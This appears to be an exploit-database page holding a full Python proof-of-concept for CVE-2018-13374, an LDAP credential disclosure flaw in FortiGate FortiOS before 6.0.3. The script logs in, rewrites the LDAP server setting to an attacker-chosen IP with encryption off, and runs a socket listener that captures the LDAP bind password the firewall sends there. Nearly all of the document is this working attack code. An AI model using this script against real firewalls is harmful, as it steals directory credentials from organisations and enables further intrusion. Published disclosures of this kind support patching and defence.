ExploitFixes
FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure 2019-01-16 17:05:04

#/usr/bin/python3

&quot;&quot;&quot;
CVE-2018-13374
Publicado por Julio Ure&ntilde;a (PlainText)
Twitter: @JulioUrena
Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/
Referencia: https://fortiguard.com/psirt/FG-IR-18-157

Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP
Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP --proxy http://127.0.0.1:8080
&quot;&quot;&quot;

from threading import Thread
from time import sleep
import json, requests, socket, sys, re, click

# Disable SSL Warning
requests.packages.urllib3.disable_warnings()

# To keep the Cookies after login.
s = requests.Session()

def AccessFortiGate(fortigate_url, username, password, proxy_addr):
url_login = fortigate_url+'/logincheck'

# Pass username and Password
payload = {&quot;ajax&quot;: 1, &quot;username&quot;:username, &quot;secretkey&quot;:password}

# verify=False - to avoid SSL warnings
r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False)

if s.cookies:
return True
else:
return False


def TriggerVuln(fortigate_url, ip, proxy_addr):
print(&quot;[+] Triggering Vulnerability&quot;)
# Access LDAP Server TAB
r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False)

# Load the response in a json object
json_data = json.loads(r.text)

# Assign values based on FortiGate LDAP configuration
name = json_data['source'][0]['name']
username = json_data['source'][0]['username']
port = int(json_data['source'][0]['port'])
cnid = json_data['source'][0]['cnid']
dn = json_data['source'][0]['dn']
ca = json_data['source'][0]['ca-cert']

thread = Thread(target = GetCreds, args = (ip, port))
thread.start()
sleep(1)

print(&quot;[+] Username: &quot;, username)

# Create json object for the vulnerable request, changing the server and setting up secure to 0
ldap_request = {&quot;info_only&quot;:1,&quot;mkey&quot;:name,&quot;ldap&quot;:{&quot;server&quot;:ip,&quot;port&quot;:port,&quot;cn_id&quot;:cnid,&quot;username&quot;:username,&quot;dn&quot;:dn,&quot;secure&quot;:0,&quot;ca&quot;:ca,&quot;type&quot;:2}}

# Trigger the vulnerability
r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False)
r.close()

def GetCreds(server, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

server_address = (server, port)
sock.bind(server_address)

sock.listen()
credentials = ''

while True:
print('[+] Waiting Fortigate connection ...')
c, client_address = sock.accept()
try:
while True:
data = c.recv(1024)
credentials = str(data)
# \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference.
# It separe the username and the password
ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace(&quot;'&quot;,&quot;&quot;)
print(&quot;[+] Password: &quot;, ldap_pass[3:-1])
break
finally:
c.shutdown(socket.SHUT_RDWR)
c.close()
sock.shutdown(socket.SHUT_RDWR)
sock.close()

if credentials:
break

def print_help(self, param, value):
if value is False:
return
click.echo(self.get_help())
self.exit()

@click.command()
@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)
@click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)
@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)
@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)
@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)
@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)
@click.pass_context


def main(self, fortigate_url, username, password, ip, proxy):
if not fortigate_url and not username and not password:
print_help(self, None, value=True)
print(&quot;[-] For usage reference use --help&quot;)
exit(0)

# Configure Proxy For Web Requests
proxy_addr = {
'http': proxy,
'https': proxy
}
message = &quot;&quot;&quot;[+] CVE-2018-13374
[+] Publicado por Julio Ure&ntilde;a (PlainText)
[+] Blog: https://plaintext.do
[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157
&quot;&quot;&quot;
print(message)

if AccessFortiGate(str(fortigate_url),username, password, proxy_addr):
print(&quot;[+] Logged in.&quot;)
sleep(1)
TriggerVuln(str(fortigate_url), ip, proxy_addr)
else:
print(&quot;[-] Unable to login. Please check the credentials and Fortigate URL.&quot;)
exit(0)

if __name__ == &quot;__main__&quot;:
main()